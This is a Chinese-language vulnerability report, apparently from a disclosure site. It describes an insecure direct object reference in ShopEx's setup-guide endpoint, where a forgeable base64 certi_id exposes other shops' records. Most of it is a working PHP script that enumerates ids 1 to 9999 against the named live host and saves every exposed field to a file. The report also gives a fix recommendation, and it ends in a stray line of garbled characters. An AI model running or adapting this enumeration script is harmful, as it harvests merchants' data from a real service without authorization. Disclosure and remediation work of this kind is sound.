|
简要描述:
ShopEx 某接口缺陷（certi_id 未做归属校验），可遍历所有使用 ShopEx 程序的网站
详细说明:
问题出现在shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数经 base64 解码（注意：base64 只是编码，不是加密，任何人都可以构造）为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站：服务端没有校验该 certi_id 是否属于当前请求者，属于典型的不安全直接对象引用（IDOR）。
<?php
// Sweep certi_id 1..9999 against the ShopEx guide endpoint; every id whose
// record the page reflects back is printed and appended to the output file
// by ShowshopExD().
// NOTE(review): this is a proof-of-concept that fires thousands of requests
// at a third-party host. Run it only with the operator's authorization and
// keep the id range as narrow as the test requires.
$firstId = 1;
$lastId  = 9999;
for ($certiId = $firstId; $certiId <= $lastId; $certiId++) {
    ShowshopExD($certiId);
}
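/**
 * Probe one ShopEx "guide" certificate id and record the shop details it exposes.
 *
 * The guide page trusts a base64-encoded JSON `refer` parameter carrying
 * `certi_id`; nothing binds that id to the caller, so the page renders the
 * shop record for whatever id we supply (an insecure direct object reference).
 * When the response echoes our `refer` back, every `<input type="text">`
 * name/value pair on the page is printed and appended to $outFile.
 *
 * NOTE(review): this sends requests to a third-party host. Only run it with
 * authorization from the site owner, and against a narrow id range.
 *
 * @param int|string $cid     certificate id to probe; coerced with intval()
 * @param string     $outFile file the matched fields are appended to
 * @return void
 */
function ShowshopExD($cid, $outFile = "c:/shopEx.txt")
{
    $endpoint = 'http://guide.ecos.shopex.cn/step2.php';
    // base64 is encoding, not encryption: anyone can forge this value.
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
    // base64 output contains '+', '/' and '=', which must be percent-encoded in a
    // query string; otherwise the server decodes a '+' as a space and the
    // request is rejected or resolves to the wrong record.
    $url = $endpoint.'?refer='.rawurlencode($refer);

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // bounded timeouts so one hung request cannot stall the whole sweep
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    $body = curl_exec($ch);
    $err  = curl_error($ch);
    curl_close($ch);

    if ($body === false) {
        echo 'certi_id '.intval($cid).': request failed: '.$err."\r\n";
        flush();
        return;
    }

    // the original tool emitted GB2312 for a Chinese Windows console; keep that
    $body = mb_convert_encoding($body, "gb2312", "UTF-8");

    // the page only reflects `refer` when the id resolved to a shop record;
    // strpos() can legitimately return 0, so compare against false, not truthiness
    if (strpos($body, $refer) === false) {
        flush();
        return;
    }

    $fp = fopen($outFile, 'ab');
    if ($fp === false) {
        echo 'cannot open '.$outFile." for append\r\n";
        flush();
        return;
    }

    preg_match_all('/<input\stype="text"(.*?)\/>/', $body, $inputs);
    foreach ($inputs[1] as $attrs) {
        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/', trim($attrs), $pair);
        // an <input> missing either attribute yields no match; skip it instead
        // of raising an undefined-index notice and writing a bogus line
        if (!isset($pair[1][0], $pair[3][0])) {
            continue;
        }
        $line = $pair[1][0].':'.$pair[3][0]."\r\n";
        echo $line;
        fwrite($fp, $line, strlen($line));
    }
    echo '--------------------------------'."\r\n";
    fclose($fp);
    flush();
}
?>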
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
修复建议：仅把 refer 换成其他加密方式只是提高了伪造门槛，并不能解决根本问题。根本修复是服务端校验 certi_id 的归属（例如绑定当前登录态，或使用服务端签发的带签名、有时效的令牌），并对该接口做访问频率限制，避免被批量遍历。
9 o- q( @ }- o |
|